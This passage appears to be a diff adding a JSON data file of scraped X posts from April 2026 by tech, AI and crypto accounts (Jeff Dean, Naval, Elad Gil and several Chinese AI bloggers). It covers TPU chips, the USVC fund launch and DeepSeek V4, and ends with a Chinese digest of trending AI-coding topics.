"https://x.com/DavidSacks/status/2047672359377588241", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://x.com/DavidSacks/status/2047671706660073767", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我也很爱吃瓜,但我觉得还是得理性吃瓜\n\n昨天 Tron 上面有 3.44 亿的 $USDT 被 Tether 冻结了,有人说这是川普家族开始对孙哥进行打压了,但是这些钱跟孙哥和 Tron 基金会根本没有一点关系 😂\n\n这些钱是柬埔寨参议员 Kok An 相关的一些资金,因为涉及了东南亚杀猪盘、网络诈骗和人口贩卖等等的犯罪,所以才被美国执法机构申请冻结了。\n\nTether 一直以来都会联合美国的执法机构对一些涉及犯罪的 $USDT 进行冻结,这没有什么好大惊小怪的,这也不是第一次冻结了,一直以来都有类似的冻结事件。", + "url": "https://x.com/wolfyxbt/status/2047669267475419273", + "published_at": "2026-04-24T13:29:31+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "今晚由于本次版本升级较大,4月25日凌晨2-4点,将进行停机更新,期间将不可用\n\n更新内容:\n1. GPT-image2 上线 3分钱一张\n2. 订单查询\n3. 发票信息管理和开票\n4. 设置余额预警\n5. 投诉与意见反馈\n6. bug修复还有性能优化", + "url": "https://x.com/bozhou_ai/status/2047668172204188156", + "published_at": "2026-04-24T13:25:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://x.com/JeffDean/status/2047665074471387456", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://x.com/naval/status/2047645157080658335", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "兄弟们,这个邀请码太难搞了\n\n我找官方要了一些,大家给 OpenClaw/Hermes Agent 配置一个免费的AI邮箱\n\nClawEmail :https://claw.163.com/?channel=gkxspace\n邀请码:CLAW0799450B9EF5\n\n可以使用两百次,大家快配置一下", + "url": "https://x.com/gkxspace/status/2047640751774060771", + "published_at": "2026-04-24T11:36:13+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 给大家科普一下现在GPT-Image-2的低价渠道\n\n第一种就是ChatGPT直充,Free号不能使用,只有 Plus 和 Pro 能够使用。这里我直接推荐两个渠道:\n\n1. 各自小店\nhttp://caowo.store \n这个店是我看到的比较便宜的,注意,这个渠道的号没有质保,随时会掉,比较便宜但是不稳定\n\n2. Gamsgo\nhttps://www.gamsgo.com/partner/9GRtg\n这个渠道做的比较大,里面的ChatGPT号有独享和共享的模式,是官方充值开的,比较稳定。\n\n第二种是逆向渠道\n\n这种是直接逆向的Codex的接口,价格不固定,普遍在1分到6分钱之间\n\n1. apimart\nhttps://apimart.ai 4分钱一张\n\n2. http://dragoncode.codes\n我自己的站,明天上线Image-2,第一周定价为3分钱一张。", + "url": "https://x.com/bozhou_ai/status/2047639906030383159", + "published_at": "2026-04-24T11:32:51+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Cursor的员工私信我要给我送TOKEN了\n\n难道看到我在AI编程工具的声量了\n\n听说cursor 2b做得不错😌,赶紧试用试用\n\n@cursor_ai 你们在中国市场机会很大,原因我就不明说了。", + "url": "https://x.com/lxfater/status/2047595092048003140", + "published_at": "2026-04-24T08:34:47+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "SBF 的投资水平:Anthropic、Cursor、SpaceX\n\nCZ 的投资水平:SBF", + "url": "https://x.com/wolfyxbt/status/2047585341515993543", + "published_at": "2026-04-24T07:56:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://x.com/naval/status/2047550896670908809", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://x.com/naval/status/2047546920747307466", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://x.com/liuliu/status/2047527371486658814", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "看到此推的所有人,现在立刻马上推荐我一个生活好物。", + "url": "https://x.com/wolfyxbt/status/2047524944280793505", + "published_at": "2026-04-24T03:56:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://x.com/naval/status/2047520212787015748", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: api-docs.deepseek.com/zh-cn/…", + "url": "https://x.com/Stv_Lynn/status/2047520184408371233", + "published_at": "2026-04-24T03:37:07+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "DeepSeek V4 支持了 FIM,也就是在一段文本的中间进行补全\n很适合代码场景", + "url": "https://x.com/Stv_Lynn/status/2047520130499051872", + "published_at": "2026-04-24T03:36:54+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://x.com/naval/status/2047519250433421604", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "claude 接入 Deepseek教程\n\n第一步: https://platform.deepseek.com/api_keys\n创建apikey\n\n第二步: 在cc Switch里面创建供应商,请求地址为 \nhttps://api.deepseek.com/anthropic\nAPIKEY 填写刚刚创建的\n\n第三步更改一下模型\n点击高级选项,然后主模型 deepseek-v4-pro haiku为 deepseek-v4-flash", + "url": "https://x.com/bozhou_ai/status/2047514776612556933", + "published_at": "2026-04-24T03:15:38+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "DeepSeek V4 终于生了!", + "url": "https://x.com/Stv_Lynn/status/2047513252171825530", + "published_at": "2026-04-24T03:09:34+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "价格屠夫,参数是真能打", + "url": "https://x.com/bozhou_ai/status/2047511335995596887", + "published_at": "2026-04-24T03:01:58+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://x.com/naval/status/2047510419565420779", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "歸藏大佬的 PPT SKill 终于来了,审美依旧没对手,可以吧之前的 PPT SKill 换掉了\n\n配合刚出的 GPT5.5 和 新版 Codex,简直无敌\n\nhttps://github.com/op7418/guizang-ppt-skill", + "url": "https://x.com/gkxspace/status/2047494444857913663", + "published_at": "2026-04-24T01:54:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://x.com/eladgil/status/2047489459378397604", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://x.com/svwang1/status/2047472537488302502", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://x.com/svwang1/status/2047470402725921150", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://x.com/eladgil/status/2047421448449630379", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://x.com/JeffDean/status/2047408945950802186", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://x.com/JeffDean/status/2047407537566495033", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://x.com/JeffDean/status/2047405389856297387", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://x.com/JeffDean/status/2047403921912873257", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://x.com/liuliu/status/2047374234004115719", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://x.com/eladgil/status/2047373700643844303", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://x.com/eladgil/status/2047365014500389353", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://x.com/eladgil/status/2047364865527075139", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://x.com/JeffDean/status/2047339995682529313", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "福利姬宝宝们,快点出来,\n\n集合了,来这个评论区集合,我有重要事情要宣布。", + "url": "https://x.com/wolfyxbt/status/2047299964158787623", + "published_at": "2026-04-23T13:02:03+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: https://claw.163.com/?channel=gkxspace\n现在可以报名内测,通过这个可以很快通过", + "url": "https://x.com/gkxspace/status/2047292526759931980", + "published_at": "2026-04-23T12:32:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "x.com/i/article/204728945783…", + "url": "https://x.com/gkxspace/status/2047291569565303239", + "published_at": "2026-04-23T12:28:41+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "有时候真的很敬佩打狗的 P 小将\n\n你只要经常去扫链,先不说能不能赚钱,但你绝对能看到这个行业内最快最早的信息源(排除一些内部人士能提前知道的信息)。很多都是一些官方都还没发布的东西、还没上线的产品,或者是一些藏在文档和代码里的蛛丝马迹,都能给这些 P 小将给提前扒出来发个币。", + "url": "https://x.com/wolfyxbt/status/2047286333505515554", + "published_at": "2026-04-23T12:07:53+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "R to @0xAA_Science: 已经修复了", + "url": "https://x.com/0xAA_Science/status/2047257535598706937", + "published_at": "2026-04-23T10:13:27+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "群友反应币安钱包看不到资产,我确认了下,的确显示异常。\n但是区块浏览器能看到资金,说明不是被盗,应该是币安钱包的节点/数据服务出了问题,资产安全,大家不要担心!\n@BinanceWallet @heyibinance @cz_binance", + "url": "https://x.com/0xAA_Science/status/2047250882287526158", + "published_at": "2026-04-23T09:47:01+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "下次香港开会可以约个休闲篮球局? 🏀", + "url": "https://x.com/0xAA_Science/status/2047222936923525438", + "published_at": "2026-04-23T07:55:58+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: GPT Image 2 is insanely good...I generated a 360° equirectangular panorama in Happycapy with just a skill + prompt. \n\nStep 1: Select the generate-image skill \n\nStep 2: Enter a prompt like: “Use a frontend 360 viewer to display an equirectangular image of […] using the GPT-Image-2 model.” \n\nWanna see how you all get creative with this", + "url": "https://x.com/Stv_Lynn/status/2047214663721681288", + "published_at": "2026-04-23T07:23:05+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://x.com/soumithchintala/status/2047191747793649805", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047145172337836139", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://x.com/CryptoCred/status/2047079463750377958", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://x.com/eladgil/status/2047052737762980083", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://x.com/AravSrinivas/status/2047019688920756504", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://x.com/AravSrinivas/status/2047016400292839808", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://x.com/morganhousel/status/2047013991046881663", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Add Cursor to Slack: http://cursor.com/api/install-slack-app", + "url": "https://x.com/cursor_ai/status/2047000519043141766", + "published_at": "2026-04-22T17:12:09+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Mention @​Cursor to kick off tasks in Slack and see updates of its work streaming in real time.\n\nCursor uses context in the thread and broader channels to create a PR for you to review and ship.", + "url": "https://x.com/cursor_ai/status/2047000517751288303", + "published_at": "2026-04-22T17:12:09+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://x.com/naval/status/2046991137022648800", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://x.com/liuliu/status/2046986486629986435", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see.\n\n@eddiejiao_obj, @drewocarr and I built a prototype to see how this could actually work, and set out to make it real. We're calling it Flipbook. (1/5)", + "url": "https://x.com/karpathy/status/2046982383430496444", + "published_at": "2026-04-22T16:00:05+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "再这样下去 image2 估计很快就要被玩坏了\n后面说不定要像 sora 一样加很多限制", + "url": "https://x.com/Stv_Lynn/status/2046968345170526386", + "published_at": "2026-04-22T15:04:18+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "最近看到一个 AI x 预测市场的项目,UniPat AI @UniPat_AI ,把预测做成了可对比、可验证的一套系统。\n\n我找创始人聊了下:\n1. 预测市场很火,但是能用 AI 精准预测的项目很少,而他们在这一方面走在了前面。\n2. 目前框架已经搭好,并且推出了 Echo 模型,目前在 benchmark 上排第一,和真实市场对比也有优势(对标 Polymarket 胜率 63.2%)。\n3. 会发币吗? 不会,打算通过卖 API 来盈利\n\n做交易 / agent / 决策系统的,可以关注一下这个方向。", + "url": "https://x.com/0xAA_Science/status/2046939173710676227", + "published_at": "2026-04-22T13:08:23+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用了两天志辉大佬开源的 skills-manage,好家伙,这个工具解决了我一个大痛点。\n\n以前我的 Skill 文件散落在各种地方,每次更新一个 Skill,得手动同步。\n\nskills-manage 用 ~/.agents/skills/ 做中央仓库,其他平台通过软链接指向这里。一处修改,全平台生效。\n\n并且:\n1. 可以从 GitHub 直接导入 Skill 仓库\n2. 支持 20+ 个 AI 编程工具(Claude Code、Cursor、Windsurf、Codex...)\n3. 有 Collection 功能,可以把常用 Skill 打包,一键安装到新平台\n4. 本地优先,数据都在本地 SQLite,不上传\n\n推荐给需要管理多个 AI 编程工具的朋友。\n\nGitHub: https://github.com/iamzhihuix/skills-manage", + "url": "https://x.com/gkxspace/status/2046938571395760307", + "published_at": "2026-04-22T13:06:00+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "x.com/i/article/204660489877…", + "url": "https://x.com/gkxspace/status/2046915506523783421", + "published_at": "2026-04-22T11:34:21+00:00", + "source": "nitter" + } + ], + "headline": "AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流", + "trending_keywords": [ + "Warp开源", + "Cursor 3.2", + "GPT-5.5", + "Claude Blender MCP", + "Nemotron 3 Nano", + "Matt Pocock Skills" + ], + "top_themes": [ + { + "title": "其他", + "count": 350 + }, + { + "title": "模型能力", + "count": 115 + }, + { + "title": "交易与市场", + "count": 20 + }, + { + "title": "算力与芯片", + "count": 15 + }, + { + "title": "投融资与并购", + "count": 13 + } + ], + "modules": { + "headline": "AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流", + "trending_keywords": [ + "Warp开源", + "Cursor 3.2", + "GPT-5.5", + "Claude Blender MCP", + "Nemotron 3 Nano", + "Matt Pocock Skills" + ], + "themes": [ + { + "id": "t1", + "title": "AI编程工具军备竞赛升级", + "subtitle": "Warp开源、Cursor 3.2、Claude Code三路夹击,开发者工作流正在被重新定义", + "priority": "P0", + "bullets": [ + "Warp昨晚开源:AGPL协议,38k+星,定位ADE,内置Agent支持Claude Code/Codex/Gemini CLI", + "Cursor 3.2发布:GPT-5.5强势入驻(CursorBench 72.8%),/multitask并行任务支持,多仓库workspace" + ], + "samples": [ + { + "text": "Warp开源38k+星,AGPL协议,定位ADE", + "url": "https://github.com/warpdotdev/warp", + "handle": "berryxia", + "date": "2026-04-28" + }, + { + "text": "Cursor 3.2发布:GPT-5.5入驻", + "url": "https://x.com/cursor_ai/status/2047744579127185843", + "handle": "cursor_ai", + "date": "2026-04-28" + } + ] + }, + { + "id": "t2", + "title": "Claude打通创意工具链", + "subtitle": "Blender MCP上线+9个创意连接器,AI从代码生成延伸到3D设计和创意工作流", + "priority": "P1", + "bullets": [ + "Claude上线Blender MCP连接器:自然语言直接操控Blender Python API,批量改物体/调场景无需写代码", + "Anthropic同时加入Blender基金会当赞助商", + "同日上线Adobe Creative Cloud、Ableton、Canva等9个创意工具连接器" + ], + "samples": [ + { + "text": 